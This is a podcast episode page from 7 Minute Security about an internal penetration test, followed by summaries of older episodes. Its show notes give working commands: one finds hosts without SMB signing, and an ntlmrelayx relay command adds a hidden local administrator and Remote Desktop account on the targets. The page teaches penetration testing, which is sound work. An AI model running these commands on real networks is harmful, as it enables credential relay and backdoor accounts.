7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Jul 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Episoder(706)

7MS #10: Information Security for the Whole Family – part 2 (audio)

7MS #10: Information Security for the Whole Family – part 2 (audio)

In this episode I talk more about some infosec-y things I'm doing on the home front to nurture a security culture (if you will) with my wife and kids. Download: Episode 10: Information Security for the Whole Family – part 2 (audio) Show notes: If you have kids and are considering a tablet for them,…

5 Apr 20147min

7MS #9: Information Security for the Whole Family (audio)

7MS #9: Information Security for the Whole Family (audio)

In this episode I talk about how being an infosec guy has ruined my family's life (well, not really) Download: Episode 9: Information Security for the Whole Family (audio) Show notes: To keep peace in your household, I'd recommend making sweeping network changes when your family members aren't around (i.e. changing the wifi password :-)…

29 Mar 20147min

7MS #8: CISSP – Is That the Cert for Me? (audio)

7MS #8: CISSP – Is That the Cert for Me? (audio)

In this episode I talk about my experience prepping for the CISSP exam. Download: Episode 8: CISSP – Is That the Cert for Me? (audio) Show notes: I used this book as my primary study tool. It comes with a whole slew of companion materials like a pre-assessment test, flashcards and 3 full practice exams.…

22 Mar 20147min

7MS #7: External Vulnerabilities that Byte (audio)

7MS #7: External Vulnerabilities that Byte (audio)

Episode lucky #7!!! In this episode I talk about external network vulnerabilities that we see in many of our assessments – some of which are pretty easy to clear up. Download: Episode 7: External Vulnerabilities that Byte (audio) Show notes: RC4 – a risk that we find just about anywhere SSL is used, but in…

15 Mar 20147min

7MS #6: Fun Firewall Rules – part 2 (audio)

7MS #6: Fun Firewall Rules – part 2 (audio)

In this episode I continue talking about some basic firewall rules that many organizations don't have in place. Download: Episode 6: Fun Firewall Rules – part 2 (audio) Show notes: Limit outbound DNS requests to just the ISP servers (or whatever external servers you use). Anytime a firewall rule is changed, perform a vulnerability scan…

8 Mar 20147min

7MS #5: Fun Firewall Rules – part 1 (audio)

7MS #5: Fun Firewall Rules – part 1 (audio)

In this episode I talk about some basic firewall rules that many organizations don't have in place. Download: Episode 5: Fun Firewall Rules – part 1 (audio) Show notes: Block outbound port TCP 25 for all devices except your mail server(s). If you use a third party mail filter like Postini or Securence, ensure that…

1 Mar 20147min

7MS #4: Patch Strategies: Part Deux (audio)

7MS #4: Patch Strategies: Part Deux (audio)

In this episode I continue talking about some dos and donts of patch strategies – this time talking about enterprise level gear. Download: Episode 4: Patch Strategies: Part Deux (audio) Show notes: There are often two trains of thought in regards to enterprise gear patching (like routers, switches, firewalls). 1. If it ain't broke, don't…

22 Feb 20146min

7MS #3: Patch Strategies: Part 1 (audio)

7MS #3: Patch Strategies: Part 1 (audio)

In this episode I talk about some trends (and problems) we're seeing on the patching front – specifically OS and third-party apps. Download: Episode 3: Patch Strategies: Part 1 (audio) Show notes: Most organizations have the Microsoft side of the house patched well – but the third party apps (Java/Flash/Reader/etc.)? Not so much…but that's just…

13 Feb 20147min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
bt-dokumentar-2
forklart
aftenpodden-usa
popradet
stopp-verden
det-store-bildet
dine-penger-pengeradet
nokon-ma-ga
fotballpodden-2
hanna-de-heldige
aftenbla-bla
frokostshowet-pa-p5
rss-ness
rss-gukild-johaug
e24-podden
rss-penger-polser-og-politikk
ukrainapodden
unitedno